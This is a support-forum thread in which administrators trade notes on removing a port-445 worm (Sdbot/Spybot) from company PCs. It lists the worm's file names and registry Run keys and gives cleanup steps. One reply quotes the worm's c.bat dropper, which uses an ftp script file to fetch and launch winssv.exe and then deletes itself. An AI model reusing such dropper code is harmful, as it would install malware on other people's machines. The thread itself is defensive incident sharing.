General
cancel
Showing results for 
Search instead for 
Did you mean: 

bling,un1oad,msupdate32,winssv,winfirewall virus attack

SOLVED
Go to solution
Ron Kinner
Honored Contributor

bling,un1oad,msupdate32,winssv,winfirewall virus attack

Just an update to help others being attacked. Our company network is currently being hammered by a virus that Norton doesn't seem to be able to kill. It detects some of it but under status it says "Leave Alone." Other parts it skips right over.

I found a program called Pocket Killbox.exe

http://download.broadbandmedic.com/Killbox.exe

which will stop the evil processes and can even remove them. Then I run HijackThis and get it out of the registry that way.

The virus is using port 445. Our IT folk have not been keeping up with the MS patches which is understandable I guess since we were in Chapter 11 and are now being merged with our rivals and they have been laying off people right and left.

The worm creates a hidden system folder called !Submit and drops two files called bling.exe and load.exe in the folder. Seems to mutate as you kill it. Kill off bling.exe and a little later you have msconfig32.exe and a little while after that you have winssv.exe which is followed by winfirewall.exe. You also get several files with misspellings of load or loud and also an un1oad with a 1 (one) instead of an L). By using Killbox on the System Process menu you can usually kill all of the critters off but you have to be fast. (The killbox instructions just say to type in the full path but it works better if you use the dropdown menu which says System Process then select the bad file and press the Yellow triangle. That just stops the process (which Task Manager and Process Explorer can't do) and you still have to delete. Sometimes you have to use Killbox to delete the files. There is a small Open Folder icon which you can click on and then drill down to C:\winnt\system32. Once you select the file you can press the Red button to kill it.

Then HijackThis will let you kill off the registry entries that start the mess. (The processes claim to be Microsoft Updates but don't believe them.) You have to kill the running processes off first or they put the registry entries right back after HijackThis finishes.

Before reconnecting to the network you have to install ZoneAlarm or it won't stay uninfected long enough to get any updates from MS. ZoneAlarm is really usueful in another way since its alerts tell you which PCs are infected.

Got to run. Have another 20 PCs to clean.

Ron
10 REPLIES
Ron Kinner
Honored Contributor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

Oops, the hidden folder !Submit is actually created by Killbox when it deletes a file. It makes a backup copy so if you kill something you shouldn't have you can restore it.

Did find another version of the virus: svhost.exe

Ron
Jon Finley
Honored Contributor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

Interesting.... Port 445 is the standard port for file sharing.

Wondering if you invoked ICF or WF (SP2) if it would block the attacks (both ICF and WF are supposed to be "stateful", in that if you did NOT originate the request out the port, it will block the request incoming to the port).

Jon
"Do or do not. There is no try!" - Yoda
Ron Kinner
Honored Contributor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

Found a file called simply O in the Winnt\System32 folder. It tells the worm where to go to get bling.exe so in a sense it points you to the infection's source.

Jon,

Doubt we will get a chance to experiment. Now that we have a cure the emphasis is on getting everybody back up. But thanks anyway.

Ron
Ron Kinner
Honored Contributor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

I came up with a way to keep the virus from reinfecting a machine without Zone Alarm. We disconnect it from the network, kill the processes and delete them with Killbox, then replace them with read only files of the same name which we make with notepad. Then remove the triggers with HijackThis and go back on the network to download the latest patches. So far it seems to work.

Ron
David Laughinghouse
Occasional Visitor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

Hi Ron,

Deleting the files and replacing them with files of the same name but with read-only flag set is a great idea. However, this does assume that we know all of the files that have been or may be created by the Virus. If you have a list, I would more than appreciate a look see.

Thanks.

David
Lefebvre_5
Occasional Visitor
Solution

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

upon connecting to the net this morning Norton antivirus found two virus files : o and .pif and put them in quarantine .. ok.
Then Norton firewall warned that winaiva.exe was attempting to connect with a high risk attack rating.
i used task manager to end the task to be able to rename the file in _old..
i discoverd also a c.bat which point to .pif and install winssv like this :

@echo off
ftp -n -v -s:.pif
winssv.exe
del .pif
del /F c.bat
exit /y

next step will be to check if registry has been changed but it seems that NAV has done the right move before the worm can go further.
as I didnt find winssv anywhere
Lefebvre_5
Occasional Visitor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

more info about registry keys :

[Virus Known As (McAfee)]
W32/Sdbot.worm=1

[Virus Known As (Symantec)]
W32.Spybot.Worm=1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\]
Win32 SSL Driver=winssv.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\]
Win32 SSL Driver=winssv.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\]
Win32 SSL Driver=winssv.exe

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\]
Win32 SSL Driver=winssv.exe

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\]
Win32 SSL Driver=winssv.exe

[FileCreated]
c:\windows\system32\winssv.exe=1

[ProcessCreated]
C:\WINDOWS\system32\winssv.exe=1

[ThreadCreated]
Count=4

Ron Kinner
Honored Contributor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

Norton now seems to recognize the files that we found to be part of the worm.

I found the c.bat file too but forgot to mention it and didn't find it until after I had written my program. It had about the same date and time as the o file. The winavia file never showed up so I guess you have a later mutation.

I will post my fakeit program as an attachment if anyone is interested. If you want to run it you will need to rename it to change the txt to bat

Ron
Danny Lim_3
Occasional Visitor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

I have downloaded Killbox.exe, but I dont really know how to use it. Like how do I know what are the bad files. If you could help to give a step by step how to do it, I would very much appreciate it. It can also help many other people like me who doesn't know much about computers.
Regards
Danny
Ron Kinner
Honored Contributor

Re: bling,un1oad,msupdate32,winssv,winfirewall virus attack

Danny,

If you don't know what file you want to kill then there is no point in using Killbox. Instead why don't you get HijackThis and Scan your system with it and then Save Log. Then start your own New Thread with HijackThis in the Subject with the log as an attachment and a short description of your problem. I will see it and tell you what to do next.

http://209.133.47.12/~merijn/files/HijackThis.exe


Ron